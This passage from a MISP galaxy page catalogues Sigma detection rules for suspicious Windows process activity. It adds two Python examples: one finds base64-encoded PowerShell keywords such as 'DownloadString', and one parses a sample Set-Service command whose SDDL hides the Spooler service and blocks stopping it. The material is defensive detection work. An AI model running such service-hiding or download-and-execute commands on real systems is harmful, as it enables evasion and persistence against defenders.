| filename | proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Rundll32 Spawned Via Explorer.EXE
Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
Internal MISP references
UUID 1723e720-616d-4ddc-ab02-f7e3685a4713 which can be used as unique global reference for Rundll32 Spawned Via Explorer.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | CD_ROM_ |
| creation_date | 2022-05-21 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_rundll32_parent_explorer.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Suspicious Reg Add BitLocker
Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
Internal MISP references
UUID 0e0255bf-2548-47b8-9582-c0955c9283f5 which can be used as unique global reference for Suspicious Reg Add BitLocker in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-11-15 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_reg_bitlocker.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1486'] |
Related clusters
To see the related clusters, click here.
Suspicious ZipExec Execution
Detects execution of ZipExec, a proof-of-concept (POC) tool that wraps binary-based tools into a password-protected zip file.
Internal MISP references
UUID 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132 which can be used as unique global reference for Suspicious ZipExec Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-11-07 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_zipexec.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.defense-evasion', 'attack.t1218', 'attack.t1202'] |
Related clusters
To see the related clusters, click here.
Rundll32 Execution Without Parameters
Detects rundll32 execution without parameters, as observed when running the Metasploit windows/smb/psexec exploit module.
Internal MISP references
UUID 5bb68627-3198-40ca-b458-49f973db8752 which can be used as unique global reference for Rundll32 Execution Without Parameters in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Bartlomiej Czyz, Relativity |
| creation_date | 2021-01-31 |
| falsepositive | ['False positives may occur if a user called rundll32 from CLI with no options'] |
| filename | proc_creation_win_rundll32_without_parameters.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1021.002', 'attack.t1570', 'attack.execution', 'attack.t1569.002'] |
Related clusters
To see the related clusters, click here.
Potential Signing Bypass Via Windows Developer Features
Detects when a user enables developer features such as "Developer Mode" or "Application Sideloading", which allow the user to install untrusted packages.
Internal MISP references
UUID a383dec4-deec-4e6e-913b-ed9249670848 which can be used as unique global reference for Potential Signing Bypass Via Windows Developer Features in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-01-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Suspicious Child Process Of Manage Engine ServiceDesk
Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
Internal MISP references
UUID cea2b7ea-792b-405f-95a1-b903ea06458f which can be used as unique global reference for Suspicious Child Process Of Manage Engine ServiceDesk in MISP communities and other software using the MISP galaxy
External references
- https://blog.viettelcybersecurity.com/saml-show-stopper/ - webarchive
- https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ - webarchive
- https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2023-01-18 |
| falsepositive | ['Legitimate sub processes started by Manage Engine ServiceDesk Pro'] |
| filename | proc_creation_win_java_manageengine_susp_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1102'] |
Related clusters
To see the related clusters, click here.
User Added To Highly Privileged Group
Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
Internal MISP references
UUID 10fb649c-3600-4d37-b1e6-56ea90bb7e09 which can be used as unique global reference for User Added To Highly Privileged Group in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-02-23 |
| falsepositive | ['Administrative activity that must be investigated'] |
| filename | proc_creation_win_susp_add_user_privileged_group.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1098'] |
Related clusters
To see the related clusters, click here.
HackTool - LocalPotato Execution
Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples
Internal MISP references
UUID 6bd75993-9888-4f91-9404-e1e4e4e34b77 which can be used as unique global reference for HackTool - LocalPotato Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-14 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_localpotato.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'cve.2023-21746'] |
Greedy File Deletion Using Del
Detects execution of the "del" builtin command to remove files using a greedy/wildcard expression. This is often used by malware to delete the contents of folders that may contain the initial infection files, or to delete evidence.
Internal MISP references
UUID 204b17ae-4007-471b-917b-b917b315c5db which can be used as unique global reference for Greedy File Deletion Using Del in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase - webarchive
- https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 , X__Junior (Nextron Systems) |
| creation_date | 2021-12-02 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_cmd_del_greedy_deletion.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1070.004'] |
Related clusters
To see the related clusters, click here.
Obfuscated PowerShell OneLiner Execution
Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
Internal MISP references
UUID 44e24481-6202-4c62-9127-5a0ae8e3fe3d which can be used as unique global reference for Obfuscated PowerShell OneLiner Execution in MISP communities and other software using the MISP galaxy
External references
- https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38 - webarchive
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_cradle_obfuscated.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @Kostastsale, TheDFIRReport |
| creation_date | 2022-05-09 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_download_cradle_obfuscated.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1059.001', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Suspicious PowerShell Encoded Command Patterns
Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains.
Internal MISP references
UUID b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c which can be used as unique global reference for Suspicious PowerShell Encoded Command Patterns in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-05-24 |
| falsepositive | ['Other tools that work with encoded scripts in the command line instead of script files'] |
| filename | proc_creation_win_powershell_base64_encoded_cmd_patterns.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.
UAC Bypass Using NTFS Reparse Point - Process
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
Internal MISP references
UUID 39ed3c80-e6a1-431b-9df3-911ac53d08a7 which can be used as unique global reference for UAC Bypass Using NTFS Reparse Point - Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christian Burkard (Nextron Systems) |
| creation_date | 2021-08-30 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_uac_bypass_ntfs_reparse_point.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002'] |
Related clusters
To see the related clusters, click here.
File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell
Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
Internal MISP references
UUID c3d76afc-93df-461e-8e67-9b2bad3f2ac4 which can be used as unique global reference for File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | @Kostastsale |
| creation_date | 2022-12-22 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1135'] |
Related clusters
To see the related clusters, click here.
Renamed BrowserCore.EXE Execution
Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
Internal MISP references
UUID 8a4519e8-e64a-40b6-ae85-ba8ad2177559 which can be used as unique global reference for Renamed BrowserCore.EXE Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Max Altgelt (Nextron Systems) |
| creation_date | 2022-06-02 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_renamed_browsercore.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.defense-evasion', 'attack.t1528', 'attack.t1036.003'] |
Related clusters
To see the related clusters, click here.
Potential Network Sniffing Activity Using Network Tools
Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Internal MISP references
UUID ba1f7802-adc7-48b4-9ecb-81e227fddfd5 which can be used as unique global reference for Potential Network Sniffing Activity Using Network Tools in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2019-10-21 |
| falsepositive | ['Legitimate administration activity to troubleshoot network issues'] |
| filename | proc_creation_win_susp_network_sniffing.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.discovery', 'attack.t1040'] |
Related clusters
To see the related clusters, click here.
UEFI Persistence Via Wpbbin - ProcessCreation
Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
Internal MISP references
UUID 4abc0ec4-db5a-412f-9632-26659cddf145 which can be used as unique global reference for UEFI Persistence Via Wpbbin - ProcessCreation in MISP communities and other software using the MISP galaxy
External references
- https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - webarchive
- https://persistence-info.github.io/Data/wpbbin.html - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-18 |
| falsepositive | ['Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)'] |
| filename | proc_creation_win_wpbbin_potential_persistence.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.t1542.001'] |
Related clusters
To see the related clusters, click here.
Malicious Base64 Encoded PowerShell Keywords in Command Lines
Detects base64 encoded strings used in hidden malicious PowerShell command lines
Internal MISP references
UUID f26c6093-6f14-4b12-800f-0fcb46f5ffd0 which can be used as unique global reference for Malicious Base64 Encoded PowerShell Keywords in Command Lines in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | John Lambert (rule) |
| creation_date | 2019-01-16 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_base64_hidden_flag.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.
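Both "Suspicious PowerShell Encoded Command Patterns" and "Malicious Base64 Encoded PowerShell Keywords in Command Lines" match base64 substrings rather than decoding anything, and each keyword needs three patterns because PowerShell encodes `-EncodedCommand` as UTF-16LE and base64 renders the same bytes differently depending on their alignment to a 3-byte group. The added example below (not code from either Sigma rule or from the MISP galaxy) derives those three substrings for a keyword, scans a command line for them, and confirms a hit by decoding the payload. The keyword list and the sample command lines are constructed for this example.

```python
"""Find base64-encoded PowerShell keywords in process command lines.

Added example, not code from the Sigma rules or the MISP galaxy.  Shows why
an encoded-keyword rule carries three base64 patterns per keyword, and how
to confirm a hit by decoding the -EncodedCommand payload.  KEYWORDS and the
sample command lines are constructed for this example.
"""
import base64
import re
from typing import List, Optional

KEYWORDS = ["hidden", "Invoke-Expression", "DownloadString", "FromBase64String"]

# -e, -ec, -en, -enc, -EncodedCommand followed by the base64 payload.
_ENC_ARG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def utf16le_b64_variants(keyword: str) -> List[str]:
    """Base64 substrings matching UTF-16LE `keyword` at each 3-byte alignment.

    Base64 maps 3 bytes to 4 characters, so a substring's encoding depends
    on how many bytes precede it modulo 3.  For each alignment, prepend that
    many dummy bytes, encode, and cut off the characters that also depend on
    the unknown neighbouring bytes (2 or 3 leading, 1 trailing if unaligned).
    """
    data = keyword.encode("utf-16le")
    variants = []
    for offset in range(3):
        enc = base64.b64encode(b"\x00" * offset + data).decode().rstrip("=")
        lead = (0, 2, 3)[offset]                          # chars mixed with dummy bytes
        trail = 1 if (offset + len(data)) % 3 else 0      # char mixed with the next byte
        variants.append(enc[lead:len(enc) - trail])
    return variants


def encoded_keyword_hits(cmdline: str, keywords: List[str] = KEYWORDS) -> List[str]:
    """Keywords whose encoded form, at any alignment, appears in the command line."""
    return [kw for kw in keywords
            if any(v in cmdline for v in utf16le_b64_variants(kw))]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode the -EncodedCommand payload (UTF-16LE) or return None."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)          # restore '=' padding if the logger stripped it
    try:
        return base64.b64decode(b64).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def build_sample(prefix: str) -> str:
    """Constructed event: hidden-window launch; `prefix` shifts the keyword alignment."""
    script = f"{prefix}Start-Process -WindowStyle hidden calc.exe"
    enc = base64.b64encode(script.encode("utf-16le")).decode()
    return f"powershell.exe -NoP -NonI -Enc {enc}"


if __name__ == "__main__":
    for p in ("", "x", "xx"):
        line = build_sample(p)
        print(encoded_keyword_hits(line), decode_encoded_command(line))
```

The three `build_sample` prefixes place `hidden` at byte offsets 54, 56 and 58 of the script, one for each alignment, so each run matches a different variant. Matching is case-sensitive by construction: `Hidden` and `hidden` encode to different base64, which is why rule authors enumerate the spellings they care about.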
Psexec Execution
Detects PsExec execution with the EULA-acceptance switch (-accepteula) on the command line.
Internal MISP references
UUID 730fc21b-eaff-474b-ad23-90fd265d4988 which can be used as unique global reference for Psexec Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | omkar72 |
| creation_date | 2020-10-30 |
| falsepositive | ['Administrative scripts.'] |
| filename | proc_creation_win_sysinternals_psexec_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.lateral-movement', 'attack.t1569', 'attack.t1021'] |
Related clusters
To see the related clusters, click here.
Interesting Service Enumeration Via Sc.EXE
Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
Internal MISP references
UUID e83e8899-c9b2-483b-b355-5decc942b959 which can be used as unique global reference for Interesting Service Enumeration Via Sc.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel |
| creation_date | 2024-02-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_sc_query_interesting_services.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.t1003', 'attack.credential-access'] |
Related clusters
To see the related clusters, click here.
Chromium Browser Instance Executed With Custom Extension
Detects a Chromium-based browser process started with the 'load-extension' flag to launch an instance with a custom extension.
Internal MISP references
UUID 88d6e60c-759d-4ac1-a447-c0f1466c2d21 which can be used as unique global reference for Chromium Browser Instance Executed With Custom Extension in MISP communities and other software using the MISP galaxy
External references
- https://redcanary.com/blog/chromeloader/ - webarchive
- https://www.mandiant.com/resources/blog/lnk-between-browsers - webarchive
- https://emkc.org/s/RJjuLa - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Aedan Russell, frack113, X__Junior (Nextron Systems) |
| creation_date | 2022-06-19 |
| falsepositive | ['Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert'] |
| filename | proc_creation_win_browsers_chromium_load_extension.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.t1176.001'] |
Related clusters
To see the related clusters, click here.
Suspicious Service DACL Modification Via Set-Service Cmdlet
Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" parameter (only available in PowerShell 7) that can be used to hide services or make them unstoppable.
Internal MISP references
UUID a95b9b42-1308-4735-a1af-abb1c5e6f5ac which can be used as unique global reference for Suspicious Service DACL Modification Via Set-Service Cmdlet in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings - webarchive
- https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-18 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_service_dacl_modification_set_service.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1543.003'] |
Related clusters
To see the related clusters, click here.
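The rule above keys on the `Set-Service` cmdlet together with deny-ACE fragments in its SDDL argument. The added example below (not code from the Sigma rule or the MISP galaxy) parses the SDDL the same way an analyst would when triaging such an alert: it resolves the two-letter rights codes to the service rights that occupy the same bit positions (the `SERVICE_*` bits line up with the generic `CC`, `DC`, `LC` codes, which is why the SANS reference's hiding descriptor reads `DCLCWPDTSD`) and reports each deny ACE that removes the ability to query, stop or delete the service. The SID abbreviations are the standard SDDL ones; the sample command lines, and the `-sd` short form of the parameter, are assumptions of this example.

```python
"""Inspect the SDDL passed to Set-Service -SecurityDescriptorSddl.

Added example, not code from the Sigma rule or the MISP galaxy.  Resolves
SDDL rights codes to the service rights sharing the same bit, then reports
deny ACEs that hide a service or block stopping/deleting it.  The sample
command lines are constructed.
"""
import re
from typing import Dict, List

# SDDL code -> service-specific right on that bit, plus standard/generic rights.
SERVICE_RIGHTS: Dict[str, str] = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
WELL_KNOWN_SIDS = {"IU": "Interactive Users", "SU": "Service Logon",
                   "BA": "Builtin Administrators", "SY": "Local System",
                   "AU": "Authenticated Users", "WD": "Everyone"}
# Denying these hides the service from status queries, or blocks stop/delete.
HIDE_OR_LOCK = {"LC", "RC", "WP", "SD"}

# '-sd' as the short form of -SecurityDescriptorSddl is an assumption of this example.
_SDDL_ARG = re.compile(r"(?i)-(?:SecurityDescriptorSddl|sd)\s+['\"]?([DOGS]:[^'\"]+)")
_DACL = re.compile(r"D:([A-Z]*(?:\([^)]*\))*)")   # DACL flags followed by its ACEs
_ACE = re.compile(r"\(([^)]*)\)")


def parse_rights(rights: str) -> List[str]:
    """Split an SDDL rights string into two-letter codes; hex masks are left as-is."""
    if rights.lower().startswith("0x"):
        return [rights]
    return [rights[i:i + 2] for i in range(0, len(rights), 2)]


def suspicious_aces(sddl: str) -> List[Dict[str, object]]:
    """Deny ACEs in the DACL that remove query/stop/delete rights."""
    m = _DACL.search(sddl)
    if not m:
        return []
    findings = []
    for ace in _ACE.findall(m.group(1)):
        fields = ace.split(";")
        if len(fields) < 6:               # type;flags;rights;object;inherit;sid
            continue
        ace_type, _flags, rights, _obj, _inherit, sid = fields[:6]
        denied = sorted(HIDE_OR_LOCK & set(parse_rights(rights)))
        if ace_type == "D" and denied:
            findings.append({"sid": sid, "principal": WELL_KNOWN_SIDS.get(sid, sid),
                             "denied": [SERVICE_RIGHTS[c] for c in denied]})
    return findings


def analyze_cmdline(cmdline: str) -> List[Dict[str, object]]:
    """Apply the check to a process-creation command line."""
    if "set-service" not in cmdline.lower():
        return []
    m = _SDDL_ARG.search(cmdline)
    return suspicious_aces(m.group(1)) if m else []


SAMPLES = [
    # Hides Spooler from interactive/service/admin principals, blocks stop and delete.
    'pwsh.exe -NoP -c "Set-Service -Name Spooler -SecurityDescriptorSddl '
    "'D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)"
    "(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCLCSWLOCRRC;;;AU)'\"",
    # Allow-only descriptor: restores a conventional DACL, nothing denied.
    'pwsh.exe -c "Set-Service -Name Spooler -sd '
    "'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)'\"",
    # Unrelated service change.
    "sc.exe config Spooler start= demand",
]

if __name__ == "__main__":
    for line in SAMPLES:
        for f in analyze_cmdline(line):
            print(f["principal"], "denied", ", ".join(f["denied"]))
```

Rights given as a hex mask (`0x...`) are passed through unresolved; a production check would also decode those, since an attacker can write the same deny ACE either way.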
Python Function Execution Security Warning Disabled In Excel
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
Internal MISP references
UUID 023c654f-8f16-44d9-bb2b-00ff36a62af9 which can be used as unique global reference for Python Function Execution Security Warning Disabled In Excel in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | @Kostastsale |
| creation_date | 2023-08-22 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_registry_office_disable_python_security_warnings.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
PUA - NPS Tunneling Tool Execution
Detects the use of NPS, a port forwarding and intranet penetration proxy server
Internal MISP references
UUID 68d37776-61db-42f5-bf54-27e87072d17e which can be used as unique global reference for PUA - NPS Tunneling Tool Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-10-08 |
| falsepositive | ['Legitimate use'] |
| filename | proc_creation_win_pua_nps.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1090'] |
Related clusters
To see the related clusters, click here.
Indirect Command Execution From Script File Via Bash.EXE
Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
Internal MISP references
UUID 2d22a514-e024-4428-9dba-41505bd63a5b which can be used as unique global reference for Indirect Command Execution From Script File Via Bash.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-15 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_bash_file_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1202'] |
Related clusters
To see the related clusters, click here.
Remote Access Tool - Anydesk Execution From Suspicious Folder
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Internal MISP references
UUID 065b00ca-5d5c-4557-ac95-64a6d0b64d86 which can be used as unique global reference for Remote Access Tool - Anydesk Execution From Suspicious Folder in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-05-20 |
| falsepositive | ['Legitimate use of AnyDesk from a non-standard folder'] |
| filename | proc_creation_win_remote_access_tools_anydesk_susp_exec.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Suspicious Processes Spawned by WinRM
Detects suspicious child processes, including command shells, spawned by the WinRM host process (wsmprovhost.exe).
Internal MISP references
UUID 5cc2cda8-f261-4d88-a2de-e9e193c86716 which can be used as unique global reference for Suspicious Processes Spawned by WinRM in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Andreas Hunkeler (@Karneades), Markus Neis |
| creation_date | 2021-05-20 |
| falsepositive | ['Legitimate WinRM usage'] |
| filename | proc_creation_win_winrm_susp_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.t1190', 'attack.initial-access', 'attack.persistence', 'attack.privilege-escalation'] |
Suspicious Windows Defender Registry Key Tampering Via Reg.EXE
Detects the usage of "reg.exe" to tamper with Windows Defender registry keys in order to disable important protection and detection features (for example real-time monitoring).
Internal MISP references
UUID 452bce90-6fb0-43cc-97a5-affc283139b3 which can be used as unique global reference for Suspicious Windows Defender Registry Key Tampering Via Reg.EXE in MISP communities and other software using the MISP galaxy
External references
- https://tria.ge/241231-j9yatstqbm/behavioral1 - webarchive
- https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2 - webarchive
- https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ - webarchive
- https://github.com/swagkarna/Defeat-Defender-V1.2.0/tree/ae4059c4276da6f6303b8f53cdff085ecae88a91 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-03-22 |
| falsepositive | ['Rare legitimate use by administrators to test software (should always be investigated)'] |
| filename | proc_creation_win_reg_windows_defender_tamper.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
